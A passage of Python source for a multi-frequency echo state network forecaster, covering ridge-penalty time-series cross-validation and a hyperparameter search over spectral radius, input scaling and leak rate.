int(cv_nums[cv_opts.index('test_size')])\n assert test_size >= 0\n if 'cv_min_split_size' in cv_opts:\n if 'cv' in cv_opts:\n print(\"[!] Option cv_min_split_size overwrites baseline CV folds option\")\n cv_min_split_size = int(cv_nums[cv_opts.index('cv_min_split_size')])\n assert cv_min_split_size >= 0\n if 'cv_max_split_size' in cv_opts:\n cv_max_split_size = int(cv_nums[cv_opts.index('cv_max_split_size')])\n assert cv_max_split_size >= 0\n\n # CV method variations\n isotropic_cv = False\n multistep_cv = False\n shift_cv = False\n if 'isotropic' in method_opts:\n isotropic_cv = True\n if 'multistep' in method_opts:\n multistep_cv = True\n if test_size is None:\n test_size = steps\n elif test_size > steps:\n print(\"[!] 
Multi-step ridge penalty cross-validation, alert:\")\n                print(f\"  : CV test split size option is {test_size}, but steps is {steps}\")\n                print(f\" -> Reducing CV test split size to {steps}\")\n                test_size = steps\n        if 'shift' in method_opts:\n            shift_cv = True\n            if cv_min_split_size is None:\n                raise ValueError(\"To use the single-shift CV option cv_min_split_size needs to be set\")\n\n        # Cross-validation object\n        if (cv_splits > 2) and (not shift_cv):\n            tscv = TimeSeriesSplit(\n                n_splits=cv_splits, \n                test_size=test_size,\n                max_train_size=cv_max_split_size, \n                #gap=0,\n            )\n        elif shift_cv:\n            tscv = ShiftTimeSeriesSplit(\n                min_split_size=cv_min_split_size,\n                test_size=test_size,\n                max_split_size=cv_max_split_size,\n            )\n        else:\n            raise ValueError(\"Please choose a number of CV splits > 2 (option '-cv:__')\")\n\n        #for train_index, test_index in tscv.split(X_multi):\n        #    print(train_index)\n        #    print(test_index)\n        #    print(\"---------------------------\")\n\n        assert steps > 0\n        if multistep_cv:\n            if steps_weights is None:\n                steps_weights = np.ones(steps) / steps\n            else:\n                assert len(steps_weights) == steps\n                steps_weights = np.squeeze(np.asarray(steps_weights))\n\n        # Ridge penalty cross-validation objective\n        if multistep_cv:\n            # State reference dates\n            #ref_dates = Y_dates\n            #ref_index = len(fit['dates']) - 1\n            #ref_dates_0 = ref_dates[ref_index:]\n\n            # Slice matrices\n            Ys = Y_[1:,]\n            Xs = X_multi[0:(-1),]\n\n            # Prepare date indexes for correct state iteration\n            cpd_x_j = []\n            tgd_x_j = []\n            kt_j = [0 for _ in range(len(X))]\n            for train_index, test_index in tscv.split(X_multi[0:(-1),]):\n                dates_split = Y_dates[test_index]\n                cpd_split = []\n                tgd_split = []\n                for j, x_j in enumerate(X):\n                    cpd, kt = closest_past_date(x_j.index, dates_split[0], cutoff=kt_j[j])\n                    cpd_split.append(cpd)\n                    kt_j[j] = kt\n                    #\n                    tgd, _ = closest_past_date(x_j.index, dates_split[-1], cutoff=kt-1)\n                    tgd_split.append(tgd)\n                cpd_x_j.append(cpd_split)\n                tgd_x_j.append(tgd_split)\n\n                #print(\"...........\")\n                #print(train_index)\n                #print(test_index)\n\n            # Multi-step ahead cross-validation\n            def CV_obj(p_lambda, p_lambda_comps):\n                # Rescale penalty\n                p_lambda = 10 ** (p_lambda)\n                #p_lambda_out = p_lambda[0:len(self.models_)]\n                #p_lambda_comps = p_lambda[len(self.models_):]\n\n                if isotropic_cv:\n                    Lambda_ = p_lambda[0]\n                else:\n                    d = np.zeros(sum(self.states_N_))\n                    i = 0\n                    for n, k in enumerate(self.states_N_):\n                        d[i:(i+k)] = p_lambda[n] * np.ones(k)\n                        i += k\n                    Lambda_ = np.diagflat(d)\n\n                Obj = 0\n                l = 0\n                for train_index, test_index in tscv.split(Xs):\n                    Ws = ls_ridge(Y=Ys[train_index,], X=Xs[train_index,], Lambda=Lambda_)\n\n                    #j_dates = Y_dates[np.hstack((train_index[-1], test_index[0:-1]))]\n                    #j_dates = Y_dates[test_index]\n                    #cpd = j_dates[0]\n                    #tgd = j_dates[-1]\n\n                    # Iterate states forward\n                    #test_dates = ref_dates[test_index]\n                    X_ms_multi = np.full((len(test_index), self.M_), np.nan)\n                    p = 0\n                    for j, x_j in enumerate(X):\n                        cpd = cpd_x_j[l][j]\n                        tgd = tgd_x_j[l][j]\n\n                        # Forward iterations indices\n                        dates_x_j = x_j.loc[cpd:tgd,].index\n                        slice_x_j = dates_x_j.get_indexer(Y_dates[test_index])\n                        iters_x_j = len(dates_x_j)\n\n                        # Autonomous weights\n                        comps_cpd = Y_dates[train_index[0]]\n                        comps_tgd = Y_dates[train_index[-1]]\n                        if self.ar_:\n                            if j == 0:\n                                Ys_j = Y.loc[comps_cpd:comps_tgd,].to_numpy()\n                            else:\n                                Ys_j = z[j-1].loc[comps_cpd:comps_tgd,].to_numpy()\n                        else:\n                            Ys_j = z[j].loc[comps_cpd:comps_tgd,].to_numpy()\n                        Xs_j = x_j.loc[comps_cpd:comps_tgd,].to_numpy()\n                        Ws_j = ls_ridge(Y=Ys_j[1:,], X=Xs_j[0:-1,], Lambda=p_lambda_comps[j])\n\n                        
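# NOTE (added comment): 'Ws_j' above refits the j-th component's own\n                        # readout on the current training window; it is what lets\n                        # base_generate_autostates() below iterate reservoir j\n                        # autonomously (with no fresh inputs) up to the target date,\n                        # with 'p_lambda_comps[j]' the per-component ridge penalty\n                        # supplied by the caller.\n                        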
# Generate states\n init_x_j = np.squeeze(x_j.loc[cpd,].to_numpy())\n Xj, _ = self.models_[j].base_generate_autostates(\n T=iters_x_j, \n W=Ws_j, init=init_x_j\n )\n #\n X_ms_multi[:,p:(p+self.models_N_[j])] = Xj[slice_x_j,]\n p += self.models_N_[j]\n #\n l += 1\n\n Ys_fit = np.hstack((np.ones((X_ms_multi.shape[0], 1)), X_ms_multi)) @ Ws\n Obj += np.sum(steps_weights * np.squeeze(Ys[test_index,] - Ys_fit) ** 2) / len(test_index)\n\n #print(\"-----------------------\")\n #print(Y_dates[train_index])\n #print(Y_dates[test_index])\n \n return Obj\n\n if debug and (isotropic_cv or len(self.models_) == 1):\n tmp_lambda_ls = np.linspace(-5, 5, 30)\n tmp_CV_obj = np.array([CV_obj(np.array((l, )), [Lambda0,]) for l in tmp_lambda_ls],)\n plt.figure(figsize=(5,2))\n plt.plot(tmp_lambda_ls, np.log10(tmp_CV_obj))\n plt.grid()\n plt.xlabel(\"$\\log_{10}(\\lambda)$\")\n plt.ylabel(\"$\\log_{10}(Loss(\\lambda))$\")\n plt.show()\n\n #print(CV_obj(np.ones(2), [1e-2, 1e-2]))\n #return [-1,]\n\n else:\n # Standard one-step-ahead cross-validation\n\n # Infer target frequency\n # NOTE: unfortunately this is needed to be able to correctly slice\n # the regressors, which are of a higher frequency than Y\n # and thus start from a previous point in time\n Y_freq = pd.infer_freq(Y_dates)\n Y_dates_offset = Y_dates - pd.tseries.frequencies.to_offset(Y_freq)\n\n # NOTE: to properly estimate CV loss, one needs to normalize data at\n # each split and re-compute states. To make obj. fun. evaluation\n # feasible, pre-compute all state matrices.\n X_multi_by_split = []\n Y_target_by_split = []\n for train_index, test_index in tscv.split(range(len(Y_dates)-1)):\n # Dates\n train_state_dates = Y_dates[train_index]\n test_state_dates = Y_dates[test_index]\n train_state_dates_offset = Y_dates_offset[train_index[[0]]]\n #test_state_dates_offset = Y_dates_offset[test_index]\n\n train_target_dates = Y_dates[[i + 1 for i in train_index]]\n test_target_dates = Y_dates[[i + 1 for i in test_index]]\n\n #print(f\"+ -------------------------------------------\")\n #print(f\"train_state_dates: \\n{train_state_dates}\\n~\")\n #print(f\"test_state_dates: \\n{test_state_dates}\\n~\")\n #print(f\"train_state_dates_offset: \\n{train_state_dates_offset}\\n~\")\n #print(f\"train_target_dates: \\n{train_target_dates}\\n~\")\n #print(f\"test_target_dates: \\n{test_target_dates}\\n~\")\n\n # Slice\n z_split = []\n #z_split_dates = []\n for j, zj in enumerate(z):\n zj_split_train = zj.loc[train_state_dates_offset[0]:train_state_dates[-1],]\n mean_zj = zj_split_train.mean()\n std_zj = zj_split_train.std()\n zj_split = (zj.loc[\n train_state_dates_offset[0]:test_state_dates[-1],\n ] - mean_zj) / std_zj\n\n z_split.append(zj_split)\n #z_split_dates.append(zj_split.index)\n \n mean_Y = Y.loc[train_state_dates[0]:train_target_dates[-1],].mean()\n std_Y = Y.loc[train_state_dates[0]:train_target_dates[-1],].std()\n Y_split_state = (Y.loc[\n train_state_dates[0]:test_state_dates[-1],\n ] - mean_Y) / std_Y\n #Y_split_state_dates = Y_split_state.index\n\n # Flatten\n Y_split_state, Y_split_state_dates, z_split, z_split_dates = (\n self.prep_data(Y_split_state, z_split)\n )\n\n # States\n X_split = self.multifreq_states(\n Y=Y_split_state, z=z_split, Y_dates=Y_split_state_dates, z_dates=z_split_dates,\n init=init, washout_len=washout_len,\n )\n\n X_split_multi = self.multifreq_states_to_matrix(\n ref_dates=Y_split_state_dates, states=X_split,\n )\n X_split_multi_train = X_split_multi[train_index,]\n X_split_multi_test = X_split_multi[test_index,]\n\n # 
Targets\n            Y_split_targets_train = ((Y.loc[train_target_dates] - mean_Y) / std_Y).to_numpy()\n            Y_split_targets_test = ((Y.loc[test_target_dates] - mean_Y) / std_Y).to_numpy()\n\n            # Save split slices\n            X_multi_by_split.append(\n                (X_split_multi_train, X_split_multi_test)\n            )\n            Y_target_by_split.append(\n                (Y_split_targets_train, Y_split_targets_test)\n            )\n\n        if debug: print(\". Folds built\")\n\n        def CV_obj(p_lambda, s):\n            # Rescale penalty\n            p_lambda = 10**(p_lambda)\n\n            if isotropic_cv:\n                Lambda_ = p_lambda[0]\n            else:\n                d = np.zeros(sum(self.states_N_))\n                i = 0\n                for n, k in enumerate(self.states_N_):\n                    d[i:(i+k)] = p_lambda[n] * np.ones(k)\n                    i += k\n                Lambda_ = np.diagflat(d)\n\n            Obj = 0\n\n            # Slice matrices\n            #Ys = Y_[(1+s):,]\n            #Xs = X_multi[0:(-1-s),]\n            #for train_index, test_index in tscv.split(Xs):\n            #    Ws = ls_ridge(Y=Ys[train_index,], X=Xs[train_index,], Lambda=Lambda_)\n            #\n            #    Ys_fit = np.hstack((np.ones((Xs[test_index,].shape[0], 1)), Xs[test_index,])) @ Ws\n            #    Obj += np.sum((Ys[test_index,] - Ys_fit) ** 2) / len(test_index)\n            #\n            #    #print(\"-----------------------\")\n            #    #print(Y_dates[train_index])\n            #    #print(Y_dates[test_index])\n\n            for j, X_multi_split_j in enumerate(X_multi_by_split):\n                Ws = ls_ridge(Y=Y_target_by_split[j][0], X=X_multi_split_j[0], Lambda=Lambda_)\n\n                Ys_fit = np.hstack((np.ones((X_multi_split_j[1].shape[0], 1)), X_multi_split_j[1])) @ Ws\n                Ys_target = Y_target_by_split[j][1]\n\n                Obj += np.mean((Ys_target - Ys_fit) ** 2)\n            \n            return Obj\n\n\n        #print(CV_obj(np.ones(1), 0))\n        #return [-1,]\n\n        if debug and (isotropic_cv or len(self.models_) == 1):\n            tmp_lambda_ls = np.linspace(-7, 5, 50)\n            tmp_CV_obj = np.array([CV_obj(np.array((l, )), 0) for l in tmp_lambda_ls])\n            plt.figure(figsize=(5,2))\n            plt.plot(tmp_lambda_ls, np.log10(tmp_CV_obj))\n            plt.grid()\n            plt.xlabel(\"$\\\log_{10}(\\\lambda)$\")\n            plt.ylabel(\"$\\\log_{10}(Loss(\\\lambda))$\")\n            plt.show()\n\n        # Initialization and bounds\n        Lambda0 = np.atleast_1d(np.asarray(np.log10(Lambda0)))\n        xl = -5 * np.ones(Lambda0.shape)\n        xu = +5 * np.ones(Lambda0.shape)\n        if pca is None:\n            if (not isotropic_cv) and (len(Lambda0) == 1):\n                Lambda0 = np.repeat(Lambda0, len(self.models_))\n                xl = np.repeat(xl, len(self.models_))\n                xu = np.repeat(xu, len(self.models_))\n        else:\n            if not len(Lambda0) == 1:\n                print(\"PCA requires scalar ridge penalty, selecting only first component of 'Lambda0'\")\n                Lambda0 = Lambda0[0]\n            xl = [-5,]\n            xu = [+5,]\n\n        # CV \n        Lambda = []\n        if multistep_cv:\n            if Lambda_comps is None:\n                Lambda_comps = Lambda0\n            else:\n                assert len(Lambda_comps) == len(self.models_)\n\n            res = scipy_minimize(\n                fun=lambda lb : CV_obj(lb, Lambda_comps),\n                x0=Lambda0,\n                bounds=tuple(zip(xl, xu)),\n                method='L-BFGS-B',\n                options={'disp': True},\n            )\n\n            if debug:\n                print(f\"+ ----------------------------\")\n                print(\"Best solution found:\")\n                print(f\"lambda = {10 ** res.x}\")\n                print(f\"F = {res.fun}\")\n\n            Lambda = np.atleast_1d(10 ** (res.x))\n\n        else:\n            for s in range(steps):\n                res_s = scipy_minimize(\n                    fun=lambda lb : CV_obj(lb, s),\n                    x0=Lambda0,\n                    bounds=tuple(zip(xl, xu)),\n                    method='L-BFGS-B',\n                    options={'disp': True},\n                )\n\n                if debug:\n                    print(f\"+ s = {s} --------------------\")\n                    print(\"Best solution found:\")\n                    print(f\"lambda = {10 ** res_s.x}\")\n                    print(f\"F = {res_s.fun}\")\n\n                Lambda.append(np.atleast_1d(10 ** (res_s.x)))\n\n        return Lambda\n\n    \n    def ridge_lambda_components_cv(self, Y, z, cv_options='-cv:5', Lambda0=1e-2,\n        init=None, washout_len=0, debug=True):\n        if debug: 
print(\"ESNMultiFrequency.ridge_lambda_components_cv()\")\n\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Decompose optimization type string\n cv_opts = re.findall(\"(?<=-)\\w+(?=:)?\", cv_options)\n cv_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", cv_options)\n\n if debug:\n print(\". CV Options:\")\n print(cv_opts)\n print(cv_nums)\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=washout_len,\n )\n\n cv_splits = 2\n test_size = None\n if 'cv' in cv_opts: \n cv_splits = int(cv_nums[cv_opts.index('cv')])\n assert cv_splits >= 0\n if 'test_size' in cv_opts:\n test_size = int(cv_nums[cv_opts.index('test_size')])\n assert test_size >= 0\n\n if cv_splits > 2:\n tscv = TimeSeriesSplit(\n n_splits=cv_splits, \n test_size=test_size,\n #max_train_size=20, \n #gap=0,\n )\n else:\n raise ValueError(\"Please choose a number of CV splits > 2 (option '-cv:__')\")\n\n \n # Standard one-step-ahead cross-validation\n def CV_obj(p_lambda, j):\n Ys_j = z[j].iloc[1:,].to_numpy()\n Xs_j = X[j].iloc[0:-1,].to_numpy()\n\n # Penalty\n k = self.states_N_[j]\n Lambda_ = np.eye(k) * (10 ** (p_lambda))\n\n Obj = 0\n for train_index, test_index in tscv.split(Xs_j):\n Ws_j = ls_ridge(Y=Ys_j[train_index,], X=Xs_j[train_index,], Lambda=Lambda_)\n\n Ys_fit = np.hstack((np.ones((Xs_j[test_index,].shape[0], 1)), Xs_j[test_index,])) @ Ws_j\n Obj += np.sum((Ys_j[test_index,] - Ys_fit) ** 2) / len(test_index)\n \n return Obj\n\n #tmp_lambda_ls = np.linspace(-6, 5, 30)\n #tmp_CV_obj = np.array([CV_obj(np.array((l, )), 0) for l in tmp_lambda_ls])\n #plt.plot(tmp_lambda_ls, tmp_CV_obj)\n #plt.grid()\n #plt.show()\n\n # Initialization and bounds\n Lambda0 = np.atleast_1d(np.array(Lambda0))\n xl = -5 * np.ones(Lambda0.shape),\n xu = +5 * np.ones(Lambda0.shape)\n if len(Lambda0) == 1:\n Lambda0 = np.repeat(Lambda0, len(self.models_))\n assert len(Lambda0) == len(self.models_), \"Lambda must have same length as number of models\"\n\n # CV\n Lambda_j = np.full(len(Lambda0), np.nan)\n for j, _ in enumerate(z_):\n res_j = scipy_minimize(\n fun=lambda lb : CV_obj(lb, j),\n x0=Lambda0[j],\n bounds=tuple(zip(xl, xu)),\n method='L-BFGS-B',\n options={'disp': True},\n )\n\n if debug:\n print(f\"+ j = {j} --------------------\")\n print(\"Best solution found:\")\n print(f\"lambda = {10 ** res_j.x}\")\n print(f\"F = {res_j.fun.round(5)}\")\n\n Lambda_j[j] = 10 ** (res_j.x)\n\n return Lambda_j\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ESN Multi-Frequency Optimization\n def optim(self, Y, z, mode='rho_lambda', steps=1, method='ridge', loss='RSS',\n \tLambda=0, init=None, washout_len=0, optimized_ESN=True, debug=True):\n if debug: print(\"ESNMultiFrequency.optim()\")\n\n # Flatter data and extract datetime indexes\n Y_, Y_dates, z_, z_dates = self.prep_data(Y, z)\n\n # Check model number vs data\n assert len(self.models_) == int(self.ar_) + len(z), \"Number of ESN models does not correspond to number of data series\"\n\n # Decompose optimization type string\n method_name = re.findall(\"^\\w+(?=-)?\", method)\n method_opts = re.findall(\"(?<=-)\\w+(?=:)?\", method)\n method_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", method)\n\n method = method_name[0]\n\n if debug:\n print(\". 
Method:\")\n print(method_name)\n print(method_opts)\n print(method_nums)\n\n mode_pars = re.findall(\"^\\w+(?=-)?\", mode)\n mode_opts = re.findall(\"(?<=-)\\w+(?=:)?\", mode)\n mode_nums = re.findall(\"(?<=:)(\\d+(?:\\.\\d+)?)\", mode)\n\n if debug:\n print(\". Mode:\")\n print(mode_pars)\n print(mode_opts)\n print(mode_nums)\n\n assert len(mode_pars) > 0, \"Optimization method must be specified\"\n mode_pars = mode_pars[0]\n\n # States\n init = [None for _ in range(int(self.ar_) + len(z))] if init is None else init\n assert len(init) == len(self.models_), \"Length of initialization 'init' must be equal to the number of ESN models\"\n \n # NOTE: we compute 'preliminary' states to create alignment\n # indexes that can be re-used in the optimization loop\n # (direct date comparison are too expensive)\n if debug: print(\". Building states date indexes\")\n\n pre_X = self.multifreq_states(\n Y=Y_, z=z_, Y_dates=Y_dates, z_dates=z_dates,\n init=init, washout_len=0,\n )\n\n # States indexes\n X_multi_idx = []\n for j, Xj in enumerate(pre_X):\n if not self.states_lags_ is None:\n idx_j = np.full((1+self.states_lags_[j], len(Y_dates)), np.nan)\n else:\n idx_j = np.full((1, len(Y_dates)), np.nan)\n kt = 0\n for t, lf_date_t in enumerate(Y_dates):\n _, kt = closest_past_date(Xj.index, lf_date_t, cutoff=kt)\n idx_j[0,t] = kt #Xj.index.get_loc(cpd)\n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n idx_j[1+l,t] = kt-1\n X_multi_idx.append(idx_j.astype(int))\n\n # OPTIONAL: reduce state dimensionalty using PCA\n pca = None\n if 'pca' in method_opts:\n pca_factor = float(method_nums[method_opts.index('pca')])\n assert pca_factor > 0\n if pca_factor > 1:\n pca_factor = int(pca_factor)\n\n # PCA\n pca = PCA(n_components=pca_factor)\n\n # Define a fit function to make objective compact\n Wfun = None\n if method == 'least_squares':\n Wfun = lambda Y, X : ls_ridge(Y=Y, X=X, Lambda=0)\n elif method == 'ridge':\n Lambda_ = None\n if not np.isscalar(Lambda):\n if pca is None:\n assert len(Lambda) == len(self.models_), \"Lambda is not scalar, must have same length as number of models\"\n d = np.zeros(sum(self.states_N_))\n i = 0\n for n, k in enumerate(self.states_N_):\n d[i:(i+k)] = Lambda[n] * np.ones(k)\n i += k\n Lambda_ = np.diagflat(d)\n else:\n Lambda_ = Lambda[0]\n else:\n Lambda_ = Lambda\n Wfun = lambda Y, X : ls_ridge(Y=Y, X=X, Lambda=Lambda_)\n elif method == 'rls':\n Wfun = lambda Y, X, W0, P0 : r_ls(Y=Y, X=X, W0=W0, P0=P0)\n else:\n raise ValueError(\"Fitting method not defined\")\n\n if debug: print(\". 
Optimization\")\n\n mN = len(self.models_N_)\n\n # Optimize\n res = None\n if mode_pars == 'RGL':\n # Fallback parameters\n cv_splits = 0\n test_size = None\n min_train_size = 1\n if 'cv' in mode_opts: \n cv_splits = int(mode_nums[mode_opts.index('cv')])\n assert cv_splits >= 0\n if method == 'rls': \n print(\"[Fit method is RLS, ignoring CV options]\")\n if 'test_size' in mode_opts:\n test_size = int(mode_nums[mode_opts.index('test_size')])\n assert test_size >= 0\n if 'min_train_size' in mode_opts:\n min_train_size = int(mode_nums[mode_opts.index('min_train_size')])\n assert min_train_size >= 0\n\n # Generate splits\n tscv = None\n if method in ('least_squares', 'ridge'):\n if cv_splits > 2:\n tscv = TimeSeriesSplit(n_splits=cv_splits, test_size=test_size)\n\n def HYPER_states(p_rho, p_gamma, p_leak_rate):\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), sum(self.states_N_)), np.nan)\n\n # Y states\n #X0 = self.models_[0].generate_states(\n # z=Y_, A=self.models_[0].A_, C=self.models_[0].C_, zeta=self.models_[0].zeta_,\n # rho=p_rho[0], gamma=p_gamma[0], leak_rate=p_leak_rate[0],\n # init=init[0], washout_len=washout_len\n #)\n #X_[:,0:self.models_N_[0]] = X0\n\n # z states\n Z = (Y, ) + z if self.ar_ else z\n p = 0 #self.models_N_[0]\n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].generate_states(\n z=zj_, A=self.models_[j].A_, C=self.models_[j].C_, zeta=self.models_[j].zeta_,\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj[X_multi_idx[j][0,],]\n # Lags\n q = p + self.models_N_[j]\n for l in range(self.states_lags_[j]):\n X_[:,q:(q+self.models_N_[j])] = Xj[X_multi_idx[j][1+l,],]\n q += self.models_N_[j]\n p += q\n\n #X_c = X_ - np.mean(X_, axis=0)\n #u, s, vh = np.linalg.svd(X_c.T @ X_c, full_matrices=False)\n\n #print(u.shape)\n #print(s)\n #print(vh.shape)\n\n #s_cumvar = np.cumsum(np.sqrt(s)) / np.sum(np.sqrt(s))\n #idx = len([1 for j in s_cumvar if j <= 0.95])\n #X_svd = 0 #u[:,0:idx]\n\n #print(X_svd[0,:])\n #print(X_svd[-1,:])\n\n # PCA\n if not pca is None:\n X_ = pca.fit_transform(X_)\n # NOTE: below is the \"wrong\" time-dimension \"PCA\"\n #X_ = pca.fit(X_.T).components_.T\n\n return X_\n\n #print(HYPER_states([0.5,0.5,0.5], [1,1,1], [0,0,0]))\n\n def HYPER_obj(parsRLGL):\n p_rho = parsRLGL[0:mN]\n # NOTE: transform lambda with an exponential function \n # to reduce parameter space size\n #p_lambda = np.exp(parsRLGL[mN:(2*mN)]) - 1\n #p_gamma = parsRLGL[(2*mN):(3*mN)]\n #p_leak_rate = parsRLGL[(3*mN):]\n\n #p_lambda = 1e-8 * np.ones(mN)\n p_gamma = parsRLGL[(mN):(2*mN)]\n p_leak_rate = parsRLGL[(2*mN):]\n\n #print(p_rho)\n #print(p_gamma)\n #print(p_leak_rate)\n\n X_ = HYPER_states(p_rho, p_gamma, p_leak_rate)\n\n #print(X_.shape)\n #print(X_[0,:])\n\n # Slice matrices\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n \n Obj = 0\n if method in ('least_squares', 'ridge'):\n if not tscv is None:\n for train_index, test_index in tscv.split(Xs):\n W_ = Wfun(Ys[train_index,], Xs[train_index])\n if loss == 'RSS':\n # RSS\n Res = (Ys[test_index,] - np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_)\n Obj += np.sum(Res ** 2) / len(test_index)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_ + 5, Ys[test_index,] + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n #Obj += np.sum(hammer_loss(Res, 0.5)) / len(test_index)\n #Obj += np.sum((Res ** 2) * np.abs(Ys[test_index,])) / 
len(test_index)\n else:\n W_ = Wfun(Ys, Xs)\n if loss == 'RSS':\n # RSS\n Res = (Ys - np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_)\n Obj += np.sum(Res ** 2)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_ + 5, Ys + 5))\n else:\n raise ValueError(\"Unknown loss function\") \n elif method == 'rls':\n V0 = np.hstack((np.ones((min_train_size, 1)), Xs[0:min_train_size,]))\n P0 = np.linalg.pinv(V0.T @ V0)\n W0 = ls_ridge(Y=Ys[0:min_train_size,], X=Xs[0:min_train_size,], Lambda=0)\n Ys_fit_0 = np.hstack((np.ones((min_train_size, 1)), Xs[0:min_train_size,])) @ W0\n W_, Ys_fit_rls = Wfun(Ys[min_train_size:,], Xs[min_train_size:,], W0=W0, P0=P0)\n #Ys_fit = np.vstack((Ys_fit_0, Ys_fit_rls))\n if loss == 'RSS':\n # RSS\n Res = (Ys - np.vstack((Ys_fit_0, Ys_fit_rls)))\n Obj += np.sum(Res ** 2) / Xs.shape[0]\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.vstack((Ys_fit_0, Ys_fit_rls)) + 5, Ys + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n else:\n raise ValueError(\"Unknown method option\")\n\n return Obj\n\n #print(HYPER_obj(0.1 * np.ones(3 * mN)))\n\n #print(HYPER_obj(np.array((2.806210327148437,2.55,1.016578674316406,4.000015258789063,2.899169921875000e-04,0))))\n\n #assert 0 == 1\n \n if method in ('ridge'):\n problem = FunctionalProblem((3 * mN),\n HYPER_obj,\n x0 = np.hstack((0.5 * np.ones(mN), np.ones(mN), 0.01* np.ones(mN))), #[0.5, 1e-8],\n xl = np.hstack((1e-2 * np.ones(mN), 1e-4 * np.ones(mN), np.zeros(mN))),\n xu = np.hstack((3 * np.ones(mN), 1e2 * np.ones(mN), 1 * np.ones(mN))), #[1.001, 1e8]\n )\n elif method in ('least_squares', 'rls'):\n # NOTE: when the method does not allow for ridge penalty \n # just create a degenerate parameter space for 'lambda'\n problem = FunctionalProblem((3 * mN),\n HYPER_obj,\n x0 = np.hstack((0.5 * np.ones(mN), np.ones(mN), 0.01* np.ones(mN))), #[0.5, 1e-8],\n xl = np.hstack((1e-2 * np.ones(mN), 1e-4 * np.ones(mN), np.zeros(mN))),\n xu = np.hstack((3 * np.ones(mN), 1e2 * np.ones(mN), 1 * np.ones(mN))), #[1.001, 1e8]\n )\n\n res_h = pymoo_minimize(\n problem, \n #PatternSearch(n=10),\n #PatternSearch(np.concatenate((0.8 * np.ones(mN), 1 * np.ones(mN), np.zeros(mN)))),\n PatternSearch(n_sample_points=250), \n #NSGA2(),\n #PSO(),\n #get_termination(\"n_eval\", 2000), \n get_termination(\"time\", \"00:03:00\"),\n #get_termination(\"time\", \"00:00:05\"),\n verbose=debug, \n seed=1203477\n )\n\n #res_h = dual_annealing(\n # HYPER_obj,\n # x0=np.concatenate((0.8 * np.ones(mN), np.ones(mN), 0.0 * np.ones(mN))),\n # bounds=tuple(zip(\n # np.concatenate((1e-2 * np.ones(mN), 1e-4 * np.ones(mN), np.zeros(mN))),\n # np.concatenate((3 * np.ones(mN), 1e2 * np.ones(mN), 1 * np.ones(mN))),\n # )),\n # #sampling_method='sobol',\n # #options={'disp': True},\n #)\n\n if debug: print(\". 
Packing result\")\n\n # Evaluate optimization fit\n rho_opt = (res_h.X)[0:mN]\n #lambda_opt = (res_h.X)[mN:]\n #lambda_opt = np.exp((res_h.X)[mN:(2*mN)]) - 1\n gamma_opt = (res_h.X)[(mN):(2*mN)]\n leak_rate_opt = (res_h.X)[(2*mN):]\n\n length_train = []\n W_ = []\n Y_fit = []\n Residuals = []\n\n if debug: \n if not pca is None:\n print(f\"PCA:\\nn_components = {pca.n_components_}\")\n print(\"Best solution found:\")\n print(f\"rho = {rho_opt}\")\n #print(f\"lambda = {lambda_opt}\")\n print(f\"gamma = {gamma_opt}\")\n print(f\"leak_rate = {leak_rate_opt}\")\n print(f\"Final objective funtion value:\")\n print(f\"F = {HYPER_obj(res_h.X)}\")\n\n X_ = HYPER_states(rho_opt, gamma_opt, leak_rate_opt)\n\n # Slice matrices\n Y_o = Y_[1:,]\n X_o = X_[0:(-1),]\n if method in ('least_squares', 'ridge') and not tscv is None:\n for train_index, test_index in tscv.split(X_o):\n W_split = Wfun(Y_o[train_index,], X_o[train_index,])\n Y_fit_split = np.hstack((np.ones((len(test_index), 1)), X_o[test_index,])) @ W_split\n Residuals_split = (Y_o[test_index,] - Y_fit_split)\n length_train.append(len(train_index))\n W_.append(W_split)\n Y_fit.append(Y_fit_split)\n Residuals.append(Residuals_split)\n elif method == 'rls':\n length_train = [0, ] #[X_o.shape[0], ]\n V0 = np.hstack((np.ones((min_train_size, 1)), X_o[0:min_train_size,]))\n P0 = np.linalg.pinv(V0.T @ V0)\n W0 = ls_ridge(Y=Y_o[0:min_train_size,], X=X_o[0:min_train_size,], Lambda=0)\n Y_fit_0 = V0 @ W0\n W_, Y_fit_rls = Wfun(Y_o[min_train_size:,], X_o[min_train_size:,], W0=W0, P0=P0)\n W_ = [W_, ]\n Y_fit = [np.vstack((Y_fit_0, Y_fit_rls)), ]\n Residuals = [(Y_o - Y_fit[0]), ]\n else:\n length_train = [0, ] #[X_o.shape[0], ]\n W_ = [Wfun(Y_o, X_o), ]\n Y_fit = [np.hstack((np.ones((X_o.shape[0], 1)), X_o)) @ W_[0], ]\n Residuals = [(Y_o - Y_fit[0]), ]\n\n # Output\n res = {\n 'rho_opt': rho_opt,\n #'lambda_opt': lambda_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = 